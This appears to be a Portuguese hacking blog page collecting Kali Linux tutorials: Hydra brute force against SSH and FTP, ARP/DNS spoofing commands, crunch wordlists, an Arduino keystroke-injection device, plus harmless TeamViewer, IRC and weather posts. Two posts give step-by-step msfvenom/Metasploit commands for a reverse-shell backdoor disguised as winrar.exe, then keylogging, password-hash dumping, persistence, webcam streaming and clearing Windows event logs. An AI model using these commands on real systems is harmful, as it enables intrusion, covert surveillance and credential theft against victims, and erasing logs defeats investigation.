Hydra – Brute Force – Realizando pequeno ataque de força bruta.

1

Bom , neste pequeno Artigo vamos entender de forma básica o funcionamento do Hydra.
Para isso, me conectei ao meu kali linux de forma remota na porta ssh e procedi com todos os passos usados para se fazer um ataque de brute force, lembrando que o fato de estar conectado via ssh não me impede de usar os programas que rodam em modo terminal, impediria de usar os pacotes que necessitem de uma interface gráfica para tal.
Bom, é importante ressaltar que estou usando um ambiente de testes, o “host alvo” é de minha propriedade e este post serve apenas paras fins de analise e estudo, não fazendo apologia a invasão. Também não me responsabilizarei por eventuais danos causados a terceiros pelo uso incorreto dessa ferramenta..

 

Aqui temos a versão do Kali que estou rodando.

Bom, o Hydra como muitos conhecem é um programa open source disponibilizado nativamente no Kali Linux, tendo também o codigo fonte disponível para download no repositório oficial do projeto. E quanto a instalação do pacote, esta não será abordada nestas minhas pequenas linhas de raciocinio.

Quem quiser saber mais sobre o Hydra pode diretamente no terminal rodar o man do programa, bastando para isso…

root@love:~# man hydra

Ele dará todas as informações necessárias para que você o conheça melhor, podendo assim planejar e executar diferentes ataques.

Neste exemplo usei como alvo uma Routerboard 433AH rodando Router OS e com usuário previamente cadastrado. Falando em hydra, é sempre interessante ter, pelo menos, o nome de usuário que será usado durante o ataque.
A senha cadastrada foi incluída no nosso arquivo de senhas, qual será usado pelo hydra para realizar os testes de login e assim verificar o password correto.

Bom, vamos ao que realmente interessa. De posse do seu Terminal, crie um arquivo onde você possa inserir prováveis senhas(veja, estamos trabalhando com prováveis senhas , aquelas que imaginamos ser usadas pelo usuario vitima do ataque.) para que possamos realizar nosso pequeno e singelo ataque.
No Terminal, crie então um arquivo, o nome pode ser qualquer um.

root@love:~# nano pass.txt

Neste arquivo insira as senhas, caso use uma lista pre definida.

 

Após termos nossa base de dados de password já pronta, vamos então verificar quais serviços o nosso host vitima está rodando, quais portas estão abertas e que possam ser testadas pelo Hydra.

root@love:~# nmap -v 10.2.2.1

Constatada as portas abertas, podemos prosseguir com nosso propósito, atacar e obter o password.
Então, vamos invocar o Hydra de forma a usar o arquivo “pass.txt” como base para as senhas.

root@love:~# hydra -l kali -P pass.txt 10.2.2.1 ssh


Explicando a linha:
Hydra: invocamos o programa a ser executado, no caso obviamente o Hydra.
O menos L minusculo “-l” especifica login(vide man hydra).
Kali= Nome do usuário a ser testado (como disse acima, user previamente cadastrador por mim)
O “-P” maiúsculo especifica um arquivo contendo senhas, caso fosse “-p” minúsculo poderíamos especificar somente um password por vez.
Pass.txt é obviamente nosso arquivo com as passwords.
10.2.2.1 é o host alvo do ataque e o SSH no final da linha indica o serviço(porta) a ser testada.

Feito isso, basta correr o comando, damos {Enter} e aguardamos que os testes se concluam. Dependendo do tamanho do seu arquivo de senhas e da complexidade isso pode demorar muito tempo… 😉

Olha, que lindo, aqui já podemos ver que o Hydra encontrou o password do usuário Kali. Isso após alguns segundos somente.

Vamos fazer um teste via ssh?

Pronto, conectado…!
Realmente funciona, e realmente da para fazer ataques de níveis bem diferentes deste, por exemplo, caso eu quisesse testar também uma serie de senhas para o protocolo(serviço ftp) bastava a mim mudar ou especificar no fim da linha onde invoco o Hydra o serviço, para um ftp teríamos:

 

root@love:~# hydra -l kali -P passftp.txt 10.2.2.1 ftp

Bom amigos, por hoje e só por hoje é só! Hehe
O hydra é um velho companheiro, e se vocẽ quiser realmente aprender sobre ele não se esqueça de ler a man do programa, não existe tutorial/artigo que se compare a qualidade das informações disponíveis lá.

DnsSpoof e ArpSpoof kali Linux

0

Boas Users!

Vamos falar um pouco hoje de dnsspoof e arpspoof,  técnica utilizada em redes cabeadas e wireless que permite ao atacante capturar informações

Comandos:

# arpspoof -i eth0 -t 192.168.1.119 -r 192.168.1.120
# dnsspoof -i eth0
# dnsspoof -i eth0 -f dns.txt

Isso foi uma pequena demostração  do que o dnsspoof e arpspoof é capaz de fazer.

 

By user777

 

 

Instalando Teamviewer no Kali Linux

0

Boas Users!

Hoje vou ensinar como instalar o famoso Teamviewer no kali linux, vamos la!

#dpkg --add-architecture i386

1

#apt-get update

 

#wget -c https://download.teamviewer.com/download/teamviewer_i386.deb

 

 

#dpkg -i teamviewer_11.0.57095_i386.deb

2

#apt-get -f install

1

Pronto pessoal, assim finalizamos a instalação!

 

By user777

Invadindo Computador com kali Linux

5

Boas Users!

Antes de mais nada um recadinho;

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

OBS: ao criar o arquivo “.exe” do backdoor, tem que ser executado no computador com  windows.

Comandos executados no video;

$ sudo msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.101 lport=4444
-f exe -o /root/Downloads/winrar.exe

sudo = Privilegio de super usuário, ja que eu executei os comandos como usuário comum OBS: se utilizar o usuário “root” não precisa do “sudo”

windows/meterpreter/reverse_tcp= MeterPreter é um interpretador de comandos do metasploit framework.

msfvenom= para criar o nosso backdoor

-p= Payload “refere-se à parte de um vírus de computador que executa uma ação nociva”

lhost= o seu IP local do kali

lport= porta que vai ser executada

-f= format “formato do arquivo que criamos no caso foi exe”

-o= out “saída”

/root/Downloads= caminho que salvei o arquivo

winrar.exe= nome dado ao payload, pode-se dar qualquer nome ao seu payload, mas sempre com a extensão “exe”

$ sudo msfconsole

msfconsole= iniciando o modulo do programa

use exploit/multi/handler

use exploit/multi/handler= Carregando módulo a ser usado

set payload windows/meterpreter/reverse_tcp

set payload windows/meterpreter/reverse_tcp= método utilizado

set lhost

set lhost= inserir o ip do kali

set lport

set lport= inserir a porta a ser utilizada

exploit

exploit = execução do backdoor

 

Seguem-se agora algumas opções:

sysinfo – esse comando vai mostrar qual a versão do windows da máquina alvo.

getsystem – Eleva o nível de privilégio para SYSTEM

ipconfig – Mostra o endereço ip da máquina alvo

screenshot – Salva um arquivo JPEG com um print da tela do computador alvo

keyscan_start – Inicia o keylogger ou seja captura tudo que for digitado no teclado do computador alvo

keyscan_dump – Visualiza os dados capturados após o keyscan_start.

keyscan_stop – Para a captura

run persistence -X – Esse comando configura a máquina alvo para que a cada boot no sistema ela estabeleça novamente a conexão com a máquina atacante.

hashdump – faz a captura do hash de senhas do computador alvo.

execute – Executa um aplicativo ex. execute -f calc.exe

shell – Abre um prompt de comando

clearev – Limpa os logs de eventos do Windows, ou seja, apaga possíveis rastros deixados por vc.

 

By user777

 

Gerando wordlist com crunch (kali linux)

0

Boas Users!

Aproveitando o belíssimo post do nosso amigo Thiago, sobre ataque de força bruta com o Hydra, vou mostrar como gerar sua própria wordlist.

“Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

 

Parâmetros do crunch:

$ sudo crunch 4 6 1234567890 -o /diretório/arquivo.lst

sudo= Permissão de super usuário

crunch= Gerador de wordlist

4= Mínimo de caracteres

6= Máximo de caracteres

1234567890= Números a serem gerados em ordens aleatória

-o= Faz com que em vez de serem apresentado no monitor os resultados dos nossos comandos, estes são escritos num ficheiro adicionados pelo parâmetro.

/diretório= Local onde será salvo o arquivo

$ sudo crunch 9 9 1234567890 -t maria@@@@ -o /diretório/arquivo.lst

-t= Inseri uma patente e modifica como entendermos. Sabemos que uma password é composta de um nome, neste caso maria mas de seguida é inserido 4 dígitos que não sabemos.

$ sudo crunch 9 9 1234567890 -t @@@@maria -o /diretório/arquivo.lst

Podemos inverter também, a sintaxe “maria@@@@”

$ sudo crunch 4 8 -f /usr/share/crunch/charset.lst mixalpha -o /diretório/arquivo.txt

Veja que nesse parâmetro do crunch, apliquei uma geração com o “charset”, uma wordlist ja pré-determinada, como “mixalpha” (letras maiúsculas e minúsculas).

Aqui foram alguns dos comandos e parâmetros do crunch, saiba mais aqui.

 

By user777

ARDUINO PRO MICRO + CARTÃO DE MEMORIA = USB RUBBER DUCKY COM EXCELENTES FUNCIONALIDADES

0

Imagine você com R$34,00 criar uma ferramenta bem semelhante ao Usb Rubber Ducky que hoje é vendido no Brasil por no minimo R$500. Agora imagine que nós iremos ver como fazer isso de uma forma simples, pratica e bem funcional.

 

Assunto de Hoje: Transforme seu Pro micro em uma poderosíssima ferramenta de testes de intrusão.
Com o dólar lá nas alturas e até mesmo com o interesse em criar você mesmo novas ferramentas as vezes somos colocados frente a situações que acabamos por economizar muitos ‘Termes'(R$). Além claro de passar divertidos momentos brincando com aquilo que mais gostamos.

Veja o Vídeo:

Nesse tutorial/Artigo/Receita de bolo nós iremos ver como fazer isso. Aconselho ver o vídeo para melhor entendimento do assunto abordado, pois lá eu tento dar detalhes do uso e simplifico as ações realizadas para construir esse brinquedinho.

 


Para isso precisaremos de:

  1. Arduino Pro Micro
  2. Leitor/Adaptador de cartão SD
  3. Um cartão Micro SD.

Com o material em mãos, a parte mais chata é realizar a soldagem, eu pelo menos por ter um problema nos nervos dos braços estou tremendo muito, o que me impede de realizar uma soldagem cirúrgica. Porém, por menos bonito que seja ainda assim consigo fazer alguns itens se tornarem funcionais.

Nesse caso, iremos ligar o Arduino diretamente ao leitor/adaptador de cartão, a sequencia de solda para os pinos são:

Sequencia

Depois de realizar a solda dos devidos pinos a seus respectivos pares devemos realizar um teste para verificar se tudo correu bem. Caso sim, ai iremos para o próximo passo.

Para fazer o teste eu indico que você use o seguinte código, esse disponível diretamente do Arduino.CC .

Segue o código:

Se após enviar o código para o Arduino e ele gravar no seu cartão SD um arquivo(como o default do cod.) chamado ‘TESTE.TXT e nele escrever a seguinte linha: “testing 1, 2, 3.” então, todos os seus passos anteriores foram feitos com sucesso e já pode ir para a próxima etapa.
Importante observar a linha 16, onde está :   if (!SD.begin(4)) {

Se feito de acordo com a sequencia de conexão acima então, obrigatoriamente deve-se usar o pino 10 onde está a atribuição do valor 4. Caso tenha usado o 4, nada precisa ser mudado.

 

Nesta Etapa daremos inicio a compilação do codigo que será o interpretador dos nossos scripts.
Para isso, basta entrarmos em : https://github.com/Seytonic/Duckduino-microSD e posteriormente clonar ou fazer download do projeto que está disponível. Algo bem semelhante a :
$git clone https://github.com/Seytonic/Duckduino-microSD.git

Após isso, entre no diretório recém criado, dentro dele vá em Duckduino-microSD e veja que só existe um arquivo, este com o nome de Duckduino-microSD.ino

 

Feito os passos acima, abra o IDE do Arduino, procure pelo arquivo .ino baixado e abra para que possa compilar e enviar ao Arduino. Feito isso, só precisaremos de entender agora como irá funcionar o nosso Sistema.

O Arduino então está programado para realizar a interpretação de comandos pre-estabelecidos e que estejam em um arquivo que é referenciado no código carreado.

 

Assim que conectamos o cabo ao pc, o arduino faz a leitura do arquivo no cartão, interpreta e executa isso.
Ou seja, o nosso Arduino é praticamente um USB R. Ducky, só temos menos processamento, mas na pratica o funcionamento é 90% ou mais similar.
Para que possamos fazer os scripts nós deveremos seguir uma sintaxe bem diferente da apresentada no vídeo anterior, desta vez usaremos praticamente o que é usado no próprio Rubber, ou seja, poderemos com pequenas alterações fazer com que nosso arduino execute as centenas de códigos já disponíveis, ou, criar os nossos próprios. Isso irá variar com certeza.
Um código usado por mim que tem basicamente a mesma função do outro vídeo é:

Para testar numa live, acesse, http://seytonic.com.
Caso deseje pode também clonar direto na sua maquina, o link para download é o seguinte:
https://github.com/Nurrl/Duckuino

Vejam só o quanto ele diminui de tamanho. Fica muito show 😉

Bom, agora o que nos resta é copiar esse código para o cartão de memoria. Após copiar para o cartão você espeta no leitor/adaptador e com um cabo USB apropriado, conectar ao PC.

Esse modelo de executar os scripts simplifica e ao mesmo tempo facilita e muito a criação e edição dos nossos ‘programas’. Isso é muito simples, funcional e pratico.
Link para os scripts já existentes do USB Rubber Ducky : https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads

 

Então pessoal, é isso.
Até a próxima.

 

Invadindo Webcam conectada no windows com “Kali Linux”

3

Boas Users!

Reforçando>> “Todas as informações aqui devem ser usadas para fins educacionais e que a invasão de dispositivos não autorizado é crime”

Hoje Iremos abordar como acessar, Webcam conectada a um S.O windows com o kali linux, lembrando que o video ja mostra logado no “msfconsole”, quem não sabe como fazer os passos anteriores, por favor acessem esse link que mostro como fazer.

 

Comandos usados no acesso;

use exploit/multi/handler

use exploit/multi/handler= Carregando módulo a ser usado

set payload windows/meterpreter/reverse_tcp

set payload windows/meterpreter/reverse_tcp= método utilizado

set lhost

set lhost= inserir o ip do kali

set lport

set lport= inserir a porta a ser utilizada

exploit

exploit = execução do backdoor

webcam_list

webcam_list= mostra se tem alguma webcam conectada

webcam_list

webcam_stream= abre a webcam remota, localmente

 

By user777

 

Instalando “IRSSI” no kali linux cliente IRC

0

Boas Users!

Vamos instalar um cliente IRC, comunicação via terminal no kali linux.

1- abra o terminal e execute;

#apt-get install irssi

2- execute o irrsi no terminal;

#irssi

Captura de tela de 2016-07-21 01-06-40

3- Em seguida execute o comando abaixo para conectar a um servidor do irc;

/server freenode.net

OBS: usei o servidor da freenode como exemplo, você pode se conectar a qualquer servidor do IRC.

Captura de tela de 2016-07-21 01-14-52

4-Agora entraremos em uma sala ou também podemos criar uma sala se caso ela nao esteja criada, com o seguinte comando;

/join prefirolinux

Captura de tela de 2016-07-21 01-15-13

Pronto, nesse momento você certamente estará conectado a uma sala do IRC, para saber mais sobre os comandos acesse esse link e boa diversão.

 

 

By user777

 

 

 

 

 

 

 

Previsão do tempo utilizando o Curl Kali Linux

0

Boas Users!

A nível de curiosidade, irei demonstrar como saber a previsão do tempo no kali linux, bem vamos lá!

 

 

Comandos utilizados:

# curl wttr.in/:help
# curl wttr.in/saopaulo
# curl wttr.in/recife
# curl wttr.in/moon

 

Bem é isso pessoal!

 

By user777